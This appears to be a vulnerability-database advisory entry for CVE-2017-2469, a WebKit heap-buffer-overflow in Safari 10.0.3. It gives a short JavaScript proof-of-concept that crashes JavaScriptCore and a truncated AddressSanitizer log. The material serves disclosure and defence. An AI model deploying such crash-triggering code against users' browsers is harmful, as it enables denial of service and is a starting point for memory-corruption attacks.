WebKit: heap-buffer-overflow in... CVE-2017-2469 CNNVD-201704-101

6.8 AV AC AU C I A
发布: 2017-04-02
修订: 2019-03-08

I confirmed the PoC crashes the release version of Safari 10.0.3(12602.4.8). (It might need to refresh the page several times.) PoC: ``` (function (x = 0) { var a; { function arguments() { } function b() { var g = 1; a[5]; } f(); g(); } }()); ``` Asan Log: ``` ==55079==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c0000c8e88 at pc 0x00010c30506a bp 0x7fff58fae860 sp 0x7fff58fae858 READ of size 8 at 0x60c0000c8e88 thread T0 #0 0x10c305069 in JSC::SymbolTableEntry::isWatchable() const (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1671069) #1 0x10c304f40 in JSC::SymbolTableEntry::prepareToWatch() (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1670f40) #2 0x10b2bd728 in JSC::CodeBlock::finishCreation(JSC::VM&, JSC::ScriptExecutable*, JSC::UnlinkedCodeBlock*, JSC::JSScope*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x629728) #3 0x10c290c73 in...

0%
当前有3条漏洞利用/PoC
当前有3条受影响产品信息